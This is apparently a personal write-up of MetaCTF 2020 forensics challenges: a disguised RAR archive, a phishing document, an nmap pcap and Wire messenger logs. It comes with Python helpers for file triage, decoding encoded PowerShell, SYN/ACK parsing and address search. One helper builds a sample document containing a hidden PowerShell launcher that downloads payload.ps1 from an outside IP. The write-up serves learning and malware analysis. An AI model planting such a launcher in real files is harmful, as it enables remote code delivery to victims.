MetaCTF Cyber Games 2020 was hosted by MetaCTF Team, a group of students from the University of Virginia who wanted to make cybersecurity more accessible.
In this year’s competition I worked solo and focused mainly on the forensics challenges (one of my strongest subjects). I wasn’t competing to win anything, just to learn new techniques and see different challenges. MetaCTF had plenty of fun challenges, some of them close to real scenarios you meet when doing forensics work.
Staging 123
“The Incident Response (IR) team identified evidence that a Threat Actor accessed a system that contains sensitive company information. The Chief Information Security Officer (CISO) wants to know if any data was accessed or taken.
There was a suspicious file created during the time frame of Threat Actor activity: C:\123.tmp. Can you check it out?”
This challenge was more of an introduction to the forensics category. A lot of CTFs make the first one or two challenges pretty straightforward, like a warm-up.
In this particular challenge, we are given a file called “123.tmp”. I follow a small procedure every time I start on a challenge: check the file type, run it through binwalk, and so on.
Checking the file type tells us that, despite the .tmp extension, this is actually a RAR archive, so we can just use the Linux tool “unrar” to extract the contents:
Once extracted, we get the flag.
MetaCTF{definitly_n0t_all_0f_y0ur_sensitive_data}
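As an added example that is not part of the original write-up, here is a small Python triage helper in the spirit of the file-type and binwalk step above: it classifies a blob by its leading bytes and also scans for known signatures at any offset, so a RAR archive renamed to 123.tmp (or an OLE compound document like the one in the next challenge) is recognised regardless of extension. The signature table is limited to a few well-known magic values, and the sample blobs are constructed for the demo.

```python
import os

# Leading-byte signatures for a few common types (well-known magic values); first match wins.
SIGNATURES = [
    (b"Rar!\x1a\x07\x01\x00", "RAR archive (v5)"),
    (b"Rar!\x1a\x07\x00", "RAR archive (v1.5 to v4)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "CDF V2 / OLE2 compound document"),
    (b"PK\x03\x04", "ZIP container (also docx, xlsx, jar)"),
    (b"MZ", "Windows PE executable"),
    (b"%PDF", "PDF document"),
]
# What the extension promises, as a prefix of the description we expect to detect.
EXPECTED = {".rar": "RAR", ".pub": "CDF V2", ".doc": "CDF V2", ".zip": "ZIP", ".exe": "Windows PE", ".pdf": "PDF"}

def identify(data: bytes) -> str:
    """Classify a blob by its leading bytes, the way `file` does for these types."""
    for magic, desc in SIGNATURES:
        if data.startswith(magic):
            return desc
    return "unknown"

def find_embedded(data: bytes) -> list:
    """Scan the whole blob for signatures at any offset (a tiny binwalk); 2-byte magics are skipped as too noisy."""
    hits = []
    for magic, desc in SIGNATURES:
        if len(magic) < 4:
            continue
        pos = data.find(magic)
        while pos != -1:
            hits.append((pos, desc))
            pos = data.find(magic, pos + 1)
    return sorted(hits)

def triage(name: str, data: bytes) -> dict:
    """Report what the extension claims versus what the bytes say."""
    ext = os.path.splitext(name)[1].lower()
    detected, expected = identify(data), EXPECTED.get(ext)
    lies = detected != "unknown" and (expected is None or not detected.startswith(expected))
    return {"name": name, "detected": detected, "extension_lies": lies, "embedded": find_embedded(data)}

# Constructed samples (not the real challenge files): a RAR handed over as 123.tmp, a genuine .pub,
# and a blob with the archive sitting behind 16 bytes of junk, which only the offset scan catches.
RAR_AS_TMP = b"Rar!\x1a\x07\x01\x00" + b"\x00" * 24
CDF_PUB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
WRAPPED = b"\x00" * 16 + RAR_AS_TMP

if __name__ == "__main__":
    for name, data in (("123.tmp", RAR_AS_TMP), ("flyer.pub", CDF_PUB), ("blob.bin", WRAPPED)):
        print(triage(name, data))
```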
Publish3r
“We believe we found a malicious file on someone’s workstation. Judging by looking at it, the file likely came from a phishing email. Anyways, we’d like you to analyze the sample, so we can see what would have happened if it executed successfully. That way we can hunt for signs of it across the enterprise. Your flag will be the URL that the malware is trying to reach out to! Can you do it? Format: MetaCTF{http://.........}”
For this challenge, we are given a file type I wasn’t very familiar with: CDF V2 Document (Composite Document File, a Windows format). This file requires Windows software to open it, but since I didn’t have any close to me (I mainly use CentOS at work lol) I had to find another way.
Simply enough, this is a data file, so I can run strings on it and pull information out of it. Running strings, I went through the output looking for anything interesting or out of the ordinary.
Right away, I noticed a PowerShell command being executed with the execution-policy Bypass switch and a base64-encoded string… I mean, what else could it be? This can be our golden ticket.
Decoding this base64 string, we get our flag:
MetaCTF{http://13.37.10.10:4443/doc/payload.ps1}
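Added example, not code from the write-up: a Python helper that does the strings-and-decode step programmatically. It finds an encoded PowerShell launcher inside a raw document blob, decodes the -EncodedCommand argument (real ones are base64 of UTF-16LE text, which the decoder checks for before falling back to UTF-8), and pulls out any URL. The embedded sample document and its launcher line are constructed for the demo and only reuse the URL from the flag above.

```python
import base64
import binascii
import re

# "powershell ... -EncodedCommand <base64>"; powershell.exe also accepts abbreviated switches such as -e, -ec, -enc
ENC_RE = re.compile(
    rb"(?i)powershell[^\r\n]*?\s-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?")

def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand value. Real ones are UTF-16LE; some CTF samples use plain UTF-8."""
    try:
        raw = base64.b64decode(b64)
    except binascii.Error:
        return ""
    # ASCII text in UTF-16LE has a NUL in every odd byte, so count them to pick the right decoding
    looks_utf16 = len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    return raw.decode("utf-16-le" if looks_utf16 else "utf-8", errors="replace")

def extract_payload_urls(blob: bytes) -> list:
    """Find encoded PowerShell launchers in a raw document blob and return the URLs they contain."""
    urls = []
    for m in ENC_RE.finditer(blob):
        command = decode_encoded_command(m.group(1).decode("ascii"))
        urls.extend(URL_RE.findall(command))
    return urls

# Constructed stand-in for the strings of a macro-carrying OLE document (not a real malware sample).
LAUNCHER = "$u='http://13.37.10.10:4443/doc/payload.ps1';Invoke-WebRequest -Uri $u"
ENCODED = base64.b64encode(LAUNCHER.encode("utf-16-le")).decode("ascii")
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8 + b"Root Entry\x00VBA\x00"
    + b'Shell("powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ' + ENCODED.encode("ascii")
    + b'")\x00\xff\xfetrailing junk'
)

if __name__ == "__main__":
    for url in extract_payload_urls(SAMPLE_DOC):
        print("reaches out to:", url)
```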
Open Thermal Exhaust Port
“Our TCP connect Nmap scan found some open ports it seems. We may only have a pcap of the traffic, but I’m sure that won’t be a problem! Can you tell us which ones they are?
The flag will be the sum of the open ports. For example, if ports 25 and 110 were open, the answer would be MetaCTF{135}.”
The description of the challenge is pretty straightforward: find which ports were scanned and reported open.
I have worked with Wireshark constantly, both in CTF challenges and at work. One thing I know about nmap scans (in most cases) is that they try to complete a TCP handshake (SYN, SYN/ACK, ACK). So the “scanner” sends a SYN, and the target responds with SYN/ACK if the port is open (in this case).
The “cheap” way for me to solve this challenge is to search the pcap file for the places where a SYN/ACK comes from the host computer, responding back to the “scanner”.
So we can find all the ports that reply with a SYN/ACK, for example port 3128:
Once we have all the ports, we can add them up to get the flag:
MetaCTF{3770}
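The SYN/ACK filter from above in code, as an added example that is not from the write-up. It parses raw Ethernet/IPv4/TCP frames, keeps only SYN/ACK replies sent by the target, and sums the source ports; RST/ACK replies (closed ports) are ignored. The capture is constructed inside the block (a scanner at 10.0.0.5 probing 10.0.0.10 is an assumption for the demo), and a real pcap would first need its per-record headers stripped before frames are fed in.

```python
import struct

SYN, RST, ACK = 0x02, 0x04, 0x10  # TCP flag bits

def ip_bytes(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))

def build_frame(src, dst, sport, dport, flags):
    """Construct a minimal Ethernet/IPv4/TCP frame (test data only; checksums left at zero)."""
    eth = b"\x00" * 12 + b"\x08\x00"  # dst MAC, src MAC, EtherType IPv4
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0, ip_bytes(src), ip_bytes(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    return eth + ip + tcp

def parse_frame(frame: bytes):
    """Return (src, dst, sport, dport, flags) for an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4  # IP header length, so the TCP header starts at 14 + ihl
    if len(frame) < 14 + ihl + 20:
        return None
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    sport, dport = struct.unpack("!HH", frame[14 + ihl:18 + ihl])
    return src, dst, sport, dport, frame[14 + ihl + 13]

def open_ports(frames, target: str) -> set:
    """Ports on `target` that answered a probe with SYN/ACK (what a connect scan reports as open).
    A RST/ACK reply means closed and no reply means filtered; neither is counted."""
    opened = set()
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt and pkt[0] == target and (pkt[4] & (SYN | ACK)) == (SYN | ACK):
            opened.add(pkt[2])
    return opened

# Constructed capture: 10.0.0.5 probes 10.0.0.10; ports 22, 80 and 3128 answer SYN/ACK, 443 answers RST/ACK
SCANNER, TARGET = "10.0.0.5", "10.0.0.10"
CAPTURE = []
for port, reply in [(22, SYN | ACK), (80, SYN | ACK), (443, RST | ACK), (3128, SYN | ACK)]:
    CAPTURE.append(build_frame(SCANNER, TARGET, 40000 + port, port, SYN))
    CAPTURE.append(build_frame(TARGET, SCANNER, port, 40000 + port, reply))

if __name__ == "__main__":
    found = open_ports(CAPTURE, TARGET)
    print(sorted(found), "sum =", sum(found))
```

In Wireshark the same selection is the display filter tcp.flags.syn == 1 && tcp.flags.ack == 1 && ip.src == <target>.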
Just In Time
“Time is running out, and we need your help! Our team has managed to recover a hard drive from a suspect’s computer, and we think there may be information pertaining to the location of an upcoming meet. Unfortunately, the user almost certainly uses an encrypted messaging program when communicating sensitive info.
We’re hoping to recover the address of the meet, which is the flag. Please enter just the street number and road, for example, 123 Easy Street. Also, to make the file download more manageable, we’re giving you just the Users folder with some large (and irrelevant) files deleted.”
This was a fun and challenging challenge (that doesn’t sound right). We were given just the Users directory of a Windows machine and we need to find “the address of the meet.” There are over 6k folders and 60k+ files given to us.
So where to start? The first thing I did was assume that the only user name in the folder is our target:
Most apps have a folder under AppData, and some save files in AppData/Roaming, like a “profile”, so that if you log in on another computer it carries over. I am not a Windows expert, but that’s my understanding.
The first place I started looking was AppData, and once in there I mainly worked in the Roaming and Local folders:
In the Roaming folder I found a few apps. Two caught my attention: Discord and Wire. I first thought Discord was what was used for the communication, but Discord is not really what you would use to send secretive encrypted messages. So I took a look at this weird Wire program:
This seems to be the program we are looking for. I struggled a little going through this particular program’s files and analysing its folders, looking for any logs of conversations, etc.
I thought this was the solution, but I was wrong. Nothing important here. After a long search, using the “find” command to look for logs, I found an interesting folder containing some logs:
I also learned a little about this particular folder, where users had reported the app constantly writing to disk: https://github.com/wireapp/wire-desktop/issues/2108
I saw that some of the logs contained message “contents”, so I ran a quick strings over all the files, just in case there was any special file, and grepped for content:
Fair enough, I found the address.
MetaCTF{933 English Muffin Way}
Note that there are possibly easier ways to solve this challenge. I could probably have come up with a beefy one-liner with the find command and searched for an address pattern (like three digits followed by words, etc.). But I was more interested in investigating what was given to me.
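One version of that find-style one-liner, as an added Python example rather than the author’s own: it walks a Users-like tree, extracts printable strings from every file (so binary or partially binary logs count too) and matches a street-address pattern. The sample tree, the Wire log path and the messages in it are constructed for the demo.

```python
import os
import re
import tempfile

# Runs of 4+ printable ASCII bytes, i.e. what `strings` extracts from a binary or mixed file
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")
# A US-style street address: a number, one to three capitalised words, then a street-type word
ADDR_RE = re.compile(r"\b\d{1,5} (?:[A-Z][a-z]+ ){1,3}(?:Way|Street|Road|Avenue|Lane|Drive|Boulevard|Court)\b")

def strings(data: bytes) -> list:
    return [m.group().decode("ascii") for m in PRINTABLE_RE.finditer(data)]

def find_addresses(root: str) -> list:
    """Walk a directory tree and return (relative path, address) pairs found in any file's strings."""
    hits = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:  # unreadable file: skip it rather than abort the whole walk
                continue
            for text in strings(data):
                for m in ADDR_RE.finditer(text):
                    hits.add((os.path.relpath(path, root), m.group()))
    return sorted(hits)

def make_sample_tree() -> str:
    """Build a constructed Users-like tree: a messenger log holding an address, plus a decoy note."""
    root = tempfile.mkdtemp(prefix="users_")
    logdir = os.path.join(root, "suspect", "AppData", "Roaming", "Wire", "logs")
    os.makedirs(logdir)
    with open(os.path.join(logdir, "app.log"), "wb") as fh:
        fh.write(b'\x00\x01{"from":"alice","content":"meet at 933 English Muffin Way, 8pm"}\n\xff\xfe')
    with open(os.path.join(root, "suspect", "notes.txt"), "wb") as fh:
        fh.write(b"call 555 about the 2020 Q3 report\n")
    return root

if __name__ == "__main__":
    for path, addr in find_addresses(make_sample_tree()):
        print(path, "->", addr)
```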
Cheers.